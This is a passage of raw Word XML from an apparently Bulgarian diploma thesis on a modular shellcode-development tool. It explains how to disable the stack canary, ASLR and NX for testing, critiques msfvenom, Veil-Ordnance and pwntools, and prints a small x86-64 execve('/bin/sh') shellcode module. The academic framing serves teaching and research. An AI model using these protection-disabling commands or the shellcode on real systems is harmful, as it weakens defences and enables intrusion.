        <w:t>. От друга страна за GCC и Linux е стандартен AT&amp;T синтаксисът, което е остатък от времето на UNIX, който по време на разработка от AT&amp;T използва свой асемблер и синтаксис. Въпреки че алтернативни асемблери като NASM използват алтернативата на Intel, естественият за Linux и GCC платформите е AT&amp;T и разработчиците там е по-вероятно да познават този синтаксис. Затова, където GCC поддържа повече от 1 синтаксис се използва вариантът на AT&amp;T.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_d9pv4yw1yiej" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="106" w:name="_Ref2190617"/>
      <w:bookmarkStart w:id="107" w:name="_Toc3540790"/>
      <w:bookmarkEnd w:id="105"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Изключване</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> на защити</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Повечето от защитите в (4.1.5) са включени по подразбиране. За по-лесна разработка на шелкод без задълбочаване в спецификите на всеки вектор за атака, в случая препълване на буфер, защитите трябва да се изключат изрично. </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Поведението на GCC и Linux може да бъде прецизно настроено. При GCC това се случва с командни аргументи, а за Linux с файлове в директория /proc/.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_7jfpiiwqtrwh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="109" w:name="_Toc3540791"/>
      <w:bookmarkEnd w:id="108"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Канарче</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Защитата от тип канарче при GCC се казва “stack protector”. Флагът “-fno-stack-protector” спира добавянето на всичките му разновидности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_xm3fybpfoo4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="111" w:name="_Toc3540792"/>
      <w:bookmarkEnd w:id="110"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>ASLR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>ASLR се контролира от файла /proc/sys/kernel/randomize_va_space.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>По подразбиране той има стойност 2</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="35"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, което позволява разместване на изпълнимия код и на статичната информация. При промяната му в 0 тази функционалност се изключва напълно</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> NOTEREF _Ref2190500 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>За целта се използва команда:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00532C4C">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sudo /bin/sh -c "echo 0 &gt; /proc/sys/kernel/randomize_va_space"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Тази защита е единствената, която трябва да се изключи ръчно. Причината е, че тя изисква root привилегии, от които инструментът няма нужда.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_wcctwmagwuef" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="113" w:name="_Toc3540793"/>
      <w:bookmarkEnd w:id="112"/>
      <w:r w:rsidRPr="00112660">
        <w:t>NX bit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Linux използва формата “ELF” за изпълними файлове и те съдържат NX флаг за всяка секция. За премахването му има няколко метода. Единият е със стартирането на програмата с </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>execstack -s program</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, а другият е при линкването</w:t>
      </w:r>
      <w:r w:rsidRPr="00326004">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ѝ</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, чрез флаг “-z execstack” подаден на линкера (ld).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_9d2yiywi5gq5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="115" w:name="_Toc3540794"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Първа </w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>версия</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> на инструмента</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Алтернативните инструменти имат няколко сериозни недостатъка:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Липса на прозрачност </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Veil Ordnance и msfvenom произвеждат готов шелкод на базата на командни аргументи, на принципа на черната кутия. Няма никаква яснота по отношение на това как реално работи той. За избора на правилния шелкод може да се използва команда msfvenom -l payloads, но в нея има разновидности като linux/x64/shell_bind_tcp и linux/x64/shell/bind_tcp. Чак след консултация с неговото “wiki”</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="36"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> се разбира в какво се различават. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Такава изолираност от една страна е удобна за целевата аудитория на инструментите - професионалисти, които се нуждаят от бързо и лесно генериране на шелкод и удобен интерфейс за вграждане в инструменти. Те са добре запознати с детайлите на процеса и подробна информация им е излишна, дори в определени случаи би могла да им пречи. Но начинаещите ще бъдат затруднени от готов байтов код, който няма как да разбират. Авторите на някои модули избират да включат коментари с инструкциите, но това е неконсистент</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>о. Ако сорс кодът е винаги наличен, начинаещите ще се ориентират по-лесно. Потребителят избира специфична шелкод реализация и я захранва с параметри. Самите му инструкции и специфични оптимизации в него остават невидими, което е особен проблем при сложни модули като тези на енкодерите.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Pwntools представя доста ръчен подход, но пък там се очаква точно обратното - потребителят е много добре запознат с индивидуалните алгоритми и оптимизации и му трябва просто забързана итерация между тях.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Липса на модулност</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>Най-малката мерна единица във msfvenom и veil-ordnance е един шелкод, от начало до край. Това е много удобно, ако потребителят е наясно с целта си или при огромен набор от варианти, както е при msfvenom. Ако задачата малко страни от стандартните реализации, няма възможност за промени и се налага на потребителят да напише нов шелкод, който да пасва на целите му. В опит за решаването на този проблем, ExploitDB поддържа база данни с потребителски шелкодове</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:endnoteReference w:id="37"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>. Въпреки това, изборът е ограничен</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Липса на спомагателни инструменти</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>След генерирането на шелкода сме оставени на произвола на съдбата - msfvenom ни позволява да го използваме в реална атака или да го подложим на анализ, но действия от типа на деасемблиране и преход между бройни системи биха били полезни за анализ на крайния резултат, например дължина на инструкциите, проверка за нулеви байтове и дебъгване на проблеми свързани с адресиране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">От разработените шелкодове личи, че тези инструменти не са оптимални за създаване на чисто нов шелкод. Забелязват се повтарящи се части, които </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>могат да се копират, като една и съща идея може да бъде развита по няколко начина. Също така има действия, независими от конкретния шелкод, които изискват две стъпки (асемблиране и вграждане в програма) - тестване и кодиране. Разработката също би се възползвала от малък комплект инструменти, като деасемблиран</w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t>е (</w:t>
      </w:r>
      <w:r w:rsidR="00532C4C">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">разработено </w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t xml:space="preserve">в т. </w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:instrText xml:space="preserve"> REF _Ref2190676 \r \h </w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>2.6.3</w:t>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000878DE">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и изваждане на асемблираните байтове в текст. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Разглединете инструментите са вдъхновение за някои функционалности - модулната структура на Veil-Ordnance и деасемблирането и кратките функции на pwntools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>С оглед на описаните недостатъци, дипломната работа си поставя следните основни цели:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Поддръжка на модули, които да могат да се комбинират в стил на cyberchef</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="38"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Поддръжка на множество архитектури </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Поддръжка на кодиране на шелкод</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Показване на асемблерен изход</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Извличане на байтов код</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Базови тестове на шелкод за лесна проверка за коректно изпълнение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Опция за деасемблиране</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Допълнителни инструменти за улесняване на разработката</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00567E8F" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Възможност за разширяване от нов потребител</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>С тези цели първата версия на инструмента дефинира няколко идеи, които поставят основата на неговото поведение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_spn502gzxu8o" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="117" w:name="_Toc3540795"/>
      <w:bookmarkEnd w:id="116"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Режими</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Лесно се забелязва, че действията “генериране”, “кодиране”, “компилиране”, “тестване” и “дебъгване” на шелкод са петте основни действия, които един потенциален потребител би искал да извършва. Затова точно те са отделени като “режими на изпълнение” или контексти за по-кратко. Тяхната цел е да изолират подобни действия в собствено пространство от имена, и по този начин потребителят да се ориентира по-лесно. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Налична е help команда за извличане на информация за всички други команди, като тя трябва да е достатъчна за самостоятелно навигиране на целия инструмент. Kогато работата в един режим приключи, генерираната досега информация се пази автоматично в глобални променливи, които се достъпват с представка “!” и потребителят може да смени режима и да продължи с неговите функционалности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_e0v9n1ltot0t" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="119" w:name="_Toc3540796"/>
      <w:bookmarkEnd w:id="118"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Модули</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Модулът представлява най-малката мерна единица в генерирането на един шелкод. Това е широко дефинирано “едно действие”, модулирано от единичните функции на pwntools, например прекратяване на програмата със системна функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> или изпълнение на друга програма чрез системна функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>execve</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. Те приемат необходими параметри като код на изход или път към програма. Тяхната цел е да са възможно най-минималистични, като включват възможно най-малко код - самия код, инициализация и специфични действия, ако се налага. Например модулът execve съдържа само следния код: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>sh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t xml:space="preserve">.ascii "/bin/sh" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>eol:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t xml:space="preserve">.byte 0xff </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>next:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %eax, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb %al, eol(%rip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>leaq sh(%rip), %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># sys_execve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>movb $59, %al</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %edx, %edx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>xorl %esi, %esi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
